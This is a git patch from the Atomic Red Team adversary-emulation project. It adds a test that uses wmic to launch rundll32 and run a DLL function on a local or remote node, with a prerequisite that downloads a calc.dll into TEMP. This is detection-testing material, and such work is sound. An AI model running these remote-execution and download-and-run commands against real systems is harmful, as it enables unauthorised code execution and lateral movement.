From b66dfc70012e8bfb5451370516a6e8d75e82eebb Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 9 Sep 2021 20:59:14 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs
 branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 37 +++++++++++++
 atomics/T1047/T1047.md                        | 53 +++++++++++++++++++
 6 files changed, 94 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6b83552d..14563449 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -885,6 +885,7 @@ execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
 execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
 execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
+execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a1afbe5c..73dbd93e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -625,6 +625,7 @@ execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
 execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
 execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
+execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3d23da0b..06c808ec 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1538,6 +1538,7 @@
   - Atomic Test #6: WMI Execute Remote Process [windows]
   - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
   - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
+  - Atomic Test #9: WMI Execute rundll32 [windows]
 
 # lateral-movement
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index ff41b5c4..8230c2f0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1105,6 +1105,7 @@
   - Atomic Test #6: WMI Execute Remote Process [windows]
   - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
   - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
+  - Atomic Test #9: WMI Execute rundll32 [windows]
 
 # exfiltration
 - [T1020 Automated Exfiltration](../../T1020/T1020.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index ab4b4b3e..7837f864 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -63763,6 +63763,43 @@ execution:
         cleanup_command: |
           $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
           $CleanupClass.Delete()
+    - name: WMI Execute rundll32
+      auto_generated_guid: '00738d2a-4651-4d76-adf2-c43a41dfb243'
+      description: 'This test uses wmic.exe to execute a DLL function using rundll32.
+        Specify a valid value for remote IP using the node parameter.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        node:
+          description: Ip Address
+          type: String
+          default: 127.0.0.1
+        dll_to_execute:
+          description: Path to DLL.
+          type: String
+          default: "$env:TEMP\\calc.dll"
+        function_to_execute:
+          description: Name of DLL function to call
+          type: String
+          default: StartW
+      dependency_executor_name: powershell
+      dependencies:
+      - description: DLL with function to execute must exist on disk at specified
+          location (#{dll_to_execute})
+        prereq_command: 'if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}'
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1047/bin/calc.dll"
+          -OutFile "#{dll_to_execute}"
+
+'
+      executor:
+        command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute}
+          #{function_to_execute}"
+
+'
+        cleanup_command: taskkill /f /im calculator.exe
+        name: powershell
 lateral-movement:
   T1550.001:
     technique:
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index 7b2812cb..cab06d68 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -22,6 +22,8 @@ An adversary can use WMI to interact with local and remote systems and use it as
 
 - [Atomic Test #8 - Create a Process using obfuscated Win32_Process](#atomic-test-8---create-a-process-using-obfuscated-win32_process)
 
+- [Atomic Test #9 - WMI Execute rundll32](#atomic-test-9---wmi-execute-rundll32)
+
 
 <br/>
 
@@ -304,4 +306,55 @@ $CleanupClass.Delete()
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - WMI Execute rundll32
+This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 00738d2a-4651-4d76-adf2-c43a41dfb243
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| node | Ip Address | String | 127.0.0.1|
+| dll_to_execute | Path to DLL. | String | $env:TEMP&#92;calc.dll|
+| function_to_execute | Name of DLL function to call | String | StartW|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}"
+```
+
+#### Cleanup Commands:
+```powershell
+taskkill /f /im calculator.exe
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1047/bin/calc.dll" -OutFile "#{dll_to_execute}"
+```
+
+
+
+
 <br/>